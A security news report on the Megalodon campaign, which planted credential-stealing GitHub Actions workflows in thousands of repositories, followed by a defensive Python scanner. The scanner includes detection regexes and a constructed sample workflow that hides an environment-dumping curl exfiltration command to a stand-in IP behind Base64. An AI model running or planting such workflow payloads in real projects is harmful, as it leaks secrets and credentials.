Megalodon Cyberattack: 5,561 GitHub Repositories Infiltrated with Malicious CI/CD Workflows

The Bottom Line: The Megalodon campaign has infiltrated over 5,700 GitHub repositories with malicious CI/CD workflows and stolen sensitive credentials. Attackers used fake identities and hidden Base64 payloads to harvest cloud credentials, SSH keys, and API keys at scale.

Security researchers have published details about a new automated campaign named Megalodon that injected 5,718 malicious commits into 5,561 GitHub repositories within a six-hour window. The attackers used throwaway accounts and fake author identities such as build-bot, auto-ci, ci-bot, and pipeline-bot. They injected GitHub Actions workflows with Base64-encoded Bash payloads that exfiltrated CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at 216.126.225[.]129:8443.

The stolen data includes CI environment variables, AWS and Google Cloud credentials, instance role credentials from AWS, Google Cloud, and Microsoft Azure, SSH private keys, Docker and Kubernetes configurations, vault tokens, Terraform credentials, shell history, API keys, database connection strings, JWTs, PEM private keys, and cloud tokens. Additionally, GitHub Actions OIDC tokens, GITHUB_TOKEN, GitLab and Bitbucket tokens, and configuration files such as .env and credentials.json were compromised.

The attackers rotated four author names and seven commit messages that mimicked routine CI maintenance. They leveraged randomly generated GitHub accounts and compromised personal access tokens or deploy keys. Two payload variants were observed: SysDiag, triggered on every push and pull request, and Optimize-Build, activated only through manual triggering. The campaign demonstrates the scale of modern supply chain attacks targeting the software development community.
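As an added example (not from the researchers' report or any GitHub tooling), the following Python scanner flags the two behaviours the article describes in a workflow file: a Base64 literal piped into `base64 -d | bash`, and curl/wget egress to a bare IP:port, checked both in the step itself and inside the decoded blob, which is decoded for review but never executed. It also filters commits by the rotated bot identities that touch `.github/workflows/`. The regexes, the sample workflow and the commit records are constructed here; 203.0.113.10 is a TEST-NET address, not the campaign's C2.

```python
from __future__ import annotations
import re
import base64

# Author identities the campaign rotated (from the report).
ROTATED_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
# A Base64 literal echoed straight into `base64 -d | sh` inside a run: step.
DECODE_TO_SHELL = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")
# curl/wget talking to a bare IP:port instead of a hostname.
RAW_IP_EGRESS = re.compile(r"\b(?:curl|wget)\b.*?\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b")


def scan_workflow(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, reason, detail) for decode-to-shell steps and raw-IP egress,
    including egress hidden inside the decoded Base64 blob (decoded, never executed)."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if m := DECODE_TO_SHELL.search(line):
            findings.append((no, "base64 payload piped to shell", m.group(1)[:16] + "..."))
            try:
                hidden = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                hidden = ""  # not valid Base64; the decode-to-shell finding stands on its own
            for hit in RAW_IP_EGRESS.finditer(hidden):
                findings.append((no, "raw IP:port egress in decoded payload", hit.group(0)))
        elif m := RAW_IP_EGRESS.search(line):
            findings.append((no, "raw IP:port egress in run step", m.group(0)))
    return findings


def suspicious_commits(commits: list[dict]) -> list[dict]:
    """Commits by a rotated bot identity that touch workflow files."""
    return [c for c in commits if c["author"] in ROTATED_AUTHORS
            and any(p.startswith(".github/workflows/") for p in c["files"])]


# Constructed sample (not a real Megalodon artifact): a SysDiag-style push/PR trigger
# with an exfil one-liner hidden behind Base64; 203.0.113.10 is a TEST-NET address.
HIDDEN = base64.b64encode(b"env | curl -s --data-binary @- http://203.0.113.10:8443/").decode()
SAMPLE_WORKFLOW = f"""name: SysDiag
on: [push, pull_request]
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - run: echo {HIDDEN} | base64 -d | bash
"""
SAMPLE_COMMITS = [
    {"author": "ci-bot", "message": "ci: update build config", "files": [".github/workflows/sysdiag.yml"]},
    {"author": "jane", "message": "fix typo", "files": ["README.md"]},
]
```

Running `scan_workflow(SAMPLE_WORKFLOW)` reports two findings on line 7 of the sample (the decode-to-shell step and the egress inside the decoded payload), and `suspicious_commits(SAMPLE_COMMITS)` returns only the ci-bot commit.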